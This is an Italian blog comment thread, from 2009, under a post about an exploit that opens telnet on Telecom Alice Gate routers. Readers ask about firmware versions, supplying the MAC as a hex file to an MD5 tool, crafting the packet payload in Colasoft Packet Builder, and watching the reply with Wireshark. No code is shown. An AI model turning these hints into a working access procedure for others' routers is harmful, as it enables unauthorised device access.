    Non ho ancora trovato il tempo di lavorare sulla 4.3.5a (così come la 4.5.0). Se sei interessato e vuoi fare una donazione contattami per mail.

  45. Antonio // ott 12, 2009 at 17:22

    Io ho un firmware 4.5.0 e vorrei fare una prova:
    qualcuno con un firmware sbloccato (tipo il 4.3.5) ed il telnet attivo, può esportare la configurazione dall’interfaccia telecom (non dal menu avanzato) e mandarmela a alicegate@trashmail.net?

    Se nel file di configurazione c’è anche il flag della porta telnet, magari caricandolo sul mio mi si attiva e riesco a riguadagnare l’accesso perso con un recente aggiornamento.

  46. Mr Wolf // ott 24, 2009 at 14:40

    Mmm… cercando, qualcuno ha scoperto un’altra soluzione:
    http://gagginaspinnata.altervista.org/blog/?p=41&cpage=1#comments
    Ma… si ottiene lo stesso risultato, cioè l’accesso alle impostazioni delle firmware originale del router?
    Adesso non ce l’ho con me e non posso provare

  47. admin // ott 24, 2009 at 14:46

    no Mr Wolf,

    quello che tu indichi si riferisce ai Dialface, non hai Pirelli.
    E comunque tutte le scoperte su questi modem credo che abbiano una sola fonte: http://www.ilpuntotecnicoeadsl.com/forum (o wiki).

    Ciao

  48. Mr Wolf // ott 27, 2009 at 13:09

    Ho capito, non sapevo ci fosse un altro produttore
    La procedura che hai descritto funziona con Alice Gate 2 plus Wi-Fi AGA_3.2.6?
    Ché poi, non ho capito una cosa: al programmino di cui hai postato il link va passato il MAC del router?

  49. admin // ott 27, 2009 at 15:13

    Ciao Mr Wolf,

    è tutto scritto sopra.
    Non funziona con AGA 3.2.6.
    Devi passare al programma un file esadecimale di 6 byte con dentro il mac.

  50. snowpunk // ott 27, 2009 at 19:48

    Ciao, e complimenti.
    Volevo solo sapere se eri al lavoro per quanto riguarda il firmware AGPF_4.5.0, che è per il momento inattaccabile.

  51. vgsangiuliano // nov 2, 2009 at 09:57

    Ciao, volevo farti una domanda: per quanto riguarda il fw AGA_3.2.4 ho preso il mac address del router che però è composto da 6 serie da 2 caratteri per un totale di 12 caratteri hex. Nel file macTemplate.hex allegato insieme a MD5.EXE vedo con hexedit un totale di 14 caratteri? cosa devo fare?

  52. Alex RM // nov 9, 2009 at 16:15

    admin@fabri: ti ho mandato un template del pacchetto da inviare con colasoft PB in cui cambiare solo i dati necessari: IP tuo e del modem, mac tuo e del modem, payload…

    Innanzitutto complimenti per l’exploit e per la partecipazione al meeting in Malesia. Purtroppo anche io ho problemi creando il template con colasoft, non potendo nenache prendere spunto dal template di esempio poiche’ il link non funziona.
    Domanda: potresti mandarlo anche a me via posta come hai fatto in precedenza con Fabri?
    Grazie in anticipo..

  53. Alex RM // nov 13, 2009 at 16:08

    Risolto e router aperto ;)
    Grazie mille per aver resa nota la tua tecnica di hacking “non invasiva” a tutta la comunita’ !!!
    Applauso…
    :D D

  54. ehila // nov 22, 2009 at 23:02

    ciao
    mi aggiungo alla lunga lista di complimenti per il lavoro.
    Vorrei segnalarti che non sono riuscito a scaricare il file da rapidshare.
    Trovando il sorgente da qualche altro sito non sono riuscito a compilarlo perchè mancava un md5.h valido (ne ho cercati un po’ ma non quello che serviva).
    Volevo segnalare a tutti che una volta ottenuto l’accesso in telnet si ha l’accesso all’applicazione …. non al sistema..(io non sono riuscito ad ottenerlo).
    Oltre a rinnovarti i miei complimenti mi piacerebbe sapere come sei riuscito a scoprire questo buco.

  55. ehila // nov 22, 2009 at 23:04

    Ciao
    mi aggiungo alla lunga lista di complimenti per il lavoro.
    Vorrei segnalarti che non sono riuscito a scaricare il file da rapidshare.
    Trovando il sorgente da qualche altro sito non sono riuscito a compilarlo perchè mancava un md5.h valido (ne ho cercati un po’ ma non quello che serviva).
    Lo script .sh mi piace.
    Volevo segnalare a tutti che una volta ottenuto l’accesso in telnet si ha l’accesso all’applicazione …. non al sistema..(io non sono riuscito ad ottenerlo).
    Oltre a rinnovarti i miei complimenti mi piacerebbe sapere come sei riuscito a scoprire questo buco.

  56. Giulio // nov 23, 2009 at 17:53

    Ciao e pur essendo l’ultimo complimenti per il lavoro fatto!
    Ho provato il tutto ma evidentemente sbaglio nello scrivere il payload (o qualcos’altro) in Colasoft.
    Ti chiedo cortesemente, come già fatto da altri, il template che non è più scaricabile da rapidshare.
    p.s. Dove vedo la risposta in Colasoft al pacchetto ?

    Comunque mitico !

  57. admin // nov 23, 2009 at 18:07

    COme richiesto da molti ho aggiornato il link al template del pacchetto per Colasost Packet Builder.

    Per monitorare la reazione del modem vi consiglio di usare Wireshark come sniffer di pacchetti.

    Ciao

Discussion Area - Leave a Comment




*
To prove that you're not a bot, enter this code
Anti-Spam Image

Alice Gate 3.46 – Cambio Password FTP »